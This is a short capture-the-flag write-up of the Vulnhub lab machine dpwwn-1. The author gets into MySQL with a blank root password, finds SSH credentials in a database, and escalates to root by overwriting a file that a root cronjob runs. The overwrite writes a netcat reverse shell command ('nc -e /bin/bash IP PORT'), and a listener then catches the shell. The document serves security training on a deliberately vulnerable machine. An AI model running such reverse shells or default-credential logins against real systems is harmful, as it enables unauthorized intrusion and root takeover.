Vulnhub - dpwwn-1 writeup

dpwwn: 1

Author: debashisace


We can see that there is a SSH and HTTP service running. And other then that we have a MySql service running.

Since MySql is an unusal service weโ€™ll just start with that.


We can try to connect to the mysql service but obviously we need username and password for that.

I first tried to login with random usernames and blank password.

Then I tried to use the common creds like admin:admin or root:admin or root: and the last one worked i.e username - root and blank password.

Since I was in the DB I started to look for anything interesting and I found a DB named SSH ๐Ÿ˜๐Ÿ˜. It had a table named users ๐Ÿ˜๐Ÿ˜, which had SSH creds. ๐Ÿ˜๐Ÿ˜


Privilege escalation

Since we are in the system letโ€™s just run the enumeration script and see if we can find anything good.

I didnโ€™t find any SUID but I found a file named in the home directory which was set to run in a cronjob as root.

Since this file will be running as root in cron we can exploit it in multiple ways. We can send a reverse shell or we can add another user with root privs etc.

Simple method is to do echo "nc -e /bin/bash IP PORT" > and then start a listner to get a reverse shell.

Now just start the listner with nc -nlvp PORT and wait to get the shell.

And now get the flag

I am not sure what are these but there are some numbers attach to the flag in the end maybe they some extra task or something but I ainโ€™t doing it. ๐Ÿ˜œ๐Ÿ˜œ

Thanks to @debashisace for this beginner level machine.

Thanks for reading, Feedback is always appreciated.

Follow me @0xmzfr for more โ€œWriteupsโ€.